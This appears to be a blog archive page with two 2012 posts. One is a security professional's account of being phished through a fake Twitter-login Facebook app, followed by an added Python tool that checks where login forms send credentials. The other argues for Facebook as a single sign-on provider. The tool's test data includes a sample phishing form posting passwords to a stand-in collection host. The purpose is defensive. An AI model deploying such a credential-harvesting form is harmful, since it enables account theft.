
Joerg Asma's Security At a Glance

Tag Archives: Login

They got me!

Posted on November 29, 2012 by Joerg Asma

Being a security professional is sometimes a difficult thing. Everybody expects you to be wise in terms of security, threats, knowing all different kinds of attacks and so on.

Being phished yourself as a security pro makes people worry even more, and they seriously ask how this could happen.

As mentioned before, I was phished some days ago, and I would like to give you my lessons learnt so that you might be slightly more careful than I was.

How Was it Done?

I received a direct message from somebody I trust. A colleague. Usually phishing mails – or tweets – are written in a way where you can see that something is wrong. Not in this case, because what I learnt from his tweets is that he has a certain way of tweeting, and accidentally his way of tweeting matched this direct message.

I was directed to a Facebook app which seemed to show Twitter videos – whatever that means. It looked like I was not logged into Twitter, so I tried to log in – and my user account was captured.

Three days later somebody wrote direct messages to my Twitter followers asking them to log on to the same web page. I saw that something was going on and changed my password, so not all of my followers received this direct message, and I sent out two public tweets saying that my account was phished.

What could I have done better?

It is a bad idea to enter social login credentials into an app. When using OAuth, the machine receives an access token, and this token is what the application uses. There is no need to enter credentials any more. So use the native application itself to authenticate, and do not enter anything anywhere else.

I looked at the Facebook application later and found that it looks really similar to the Twitter login application. I reviewed the code of this application and saw that it was linked to an external web server with a really strange name. That should have worried me.

My conclusion is: If I do not know a Facebook app, I should verify where it comes from and look at the code, which tells you where the server is. The easiest way is to open the source code window of this website; you will then see the server name in the text editor headline. If it looks strange, stay away!
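The check described above (look at the page's code and see which server it really talks to) can also be done mechanically. The following is an added example, not code from the original post: it parses a page's HTML, resolves every form action and script/iframe source against the page URL, and flags any form containing a password field that posts to a host other than the page's own. The sample HTML and the host names in it are constructed for this example; the app the post describes is not known to us.

```python
"""Find out where a login page actually sends credentials.

Added example (not from the original post). It applies the advice
"look at the code which tells you where the server is": collect every
form action and every script/iframe source, resolve them against the
page URL, and flag any password form whose target host differs from
the page's own host. All sample HTML below is constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _LoginAuditParser(HTMLParser):
    """Collect form actions (noting password fields) and external resources."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []          # dicts: {"action": absolute URL, "has_password": bool}
        self.resources = set()   # absolute URLs of <script src> and <iframe src>
        self._current = None     # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # An empty or missing action means "post back to this page".
            action = urljoin(self.page_url, attrs.get("action") or "")
            self._current = {"action": action, "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True
        elif tag in ("script", "iframe") and attrs.get("src"):
            self.resources.add(urljoin(self.page_url, attrs["src"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _host(url):
    return (urlsplit(url).hostname or "").lower()


def audit_login_page(page_url, html):
    """Return which hosts receive credentials and whether any differ from the page host."""
    parser = _LoginAuditParser(page_url)
    parser.feed(html)
    own = _host(page_url)
    credential_hosts = sorted({_host(f["action"]) for f in parser.forms if f["has_password"]})
    third_party = sorted({_host(r) for r in parser.resources if _host(r) != own})
    return {
        "page_host": own,
        "credential_hosts": credential_hosts,
        "third_party_resource_hosts": third_party,
        "credentials_leave_page_host": any(h != own for h in credential_hosts),
    }


# Constructed sample: a look-alike login form that posts to a strange host.
SUSPICIOUS_URL = "https://apps.example-social.test/twitter-videos/"
SUSPICIOUS_HTML = """
<html><body>
<h1>Sign in to see the videos</h1>
<form action="https://strange-name.example.test/collect.php" method="post">
  <input name="username"><input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
<script src="https://cdn.strange-name.example.test/app.js"></script>
</body></html>
"""

# Constructed sample: a form that posts back to the same host.
LEGIT_URL = "https://www.example-social.test/login"
LEGIT_HTML = """
<html><body>
<form action="/sessions" method="post">
  <input name="user"><input type="PASSWORD" name="pw">
</form>
<script src="/static/login.js"></script>
</body></html>
"""

if __name__ == "__main__":
    for url, html in ((SUSPICIOUS_URL, SUSPICIOUS_HTML), (LEGIT_URL, LEGIT_HTML)):
        print(url, audit_login_page(url, html))
```

The result to look at is `credentials_leave_page_host`: a login form on one host that posts to another is the pattern the post describes, and is exactly what a quick look at the page source would have revealed. The third-party resource list is secondary; many legitimate sites load scripts from a CDN, so it is a prompt to look closer rather than a verdict on its own.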

Two very simple things to make yourself more secure.

What else did I do?

You should also verify the apps that have a trust relationship with Twitter, just in case anybody installed something there. If you don't know an app, revoke its access.

Furthermore, change ALL your passwords on sites that use the same password as the phished application.

Last but not least: Communicate openly that you have been a victim, to stop the infection of your followers.

Posted in Joerg Asma, Social Networks | Tagged Facebook, Facebook Platform, Login, Online Communities, Phish, Social Networking, Twitter, User (computing)

A theory about securing passwords

Posted on September 15, 2012 by Joerg Asma

During the last years I was really impressed by what happened with the internet. Maybe you don't share my view, but I got the impression that content is becoming richer. On the other hand, the curators of these rich websites want to "own" the user by simply knowing him or her, and ask new users to register.

There is nothing to complain about, but there is no common sense on the internet about password complexity, and you sometimes see really strange password rules for very simple content.

What happens? You register and you try to harmonize your passwords across different platforms. In the end you are not successful and have a couple of different login credentials you cannot remember at all. One day I counted the login credentials I need for different websites (Facebook, Twitter, LinkedIn, Yahoo, Google, banking, asalavista.net and so on). I stopped counting when I reached 30 websites with around 2 different login credentials. I am using a password safe I have written on my own, but others are using open source or public domain software without really knowing what it does with your passwords.

I believe it is a better idea to have one public authentication provider which is widely spread and that has a big interest in safeguarding the identity of the users.

I found a good article / infographic at gigya.com showing the market reach of Facebook, Twitter, LinkedIn, Yahoo and Google.

It was no surprise to me that Facebook seems to have the most users – and websites. But it was a surprise that 37% of business websites already seem to use Facebook Connect. I started to review most of the websites I am using and found that most of them already have a Facebook Connect button, and some are offering multiple login buttons (Facebook and Twitter, or Facebook and LinkedIn).

Think about the idea that you only log in once into your Facebook account, and the rest of the websites you use can rely on this authentication to identify you properly. I like that idea very much because it would help me to use one single and very complex password instead of dozens of passwords which are not that complex.

Some people might now say that it is not a good idea to use Facebook because they are considered to misbehave in terms of privacy, and I fully agree with this. But for using Facebook as an identity provider you do not need to tell them everything about yourself. You do not need to share pictures, do not need to press the Like button, and do not need to connect to other people or use Facebook apps.

In the end I believe that there is hardly any other social website than Facebook that has this interest in maintaining the integrity of your digital identity. There is one simple reason: If they don't know you, your profile has no value. The value of all the Facebook profiles together reflects the value of the Facebook brand. Remember Facebook's IPO and you will understand what I mean.

Think about it! Maybe you'll like the idea!

Posted in Big Picture, Cybersecurity, Joerg Asma, Social Networks | Tagged Digital identity, Facebook, Facebook Connect, LinkedIn, Login, Password, Security, Twitter | 9 Replies
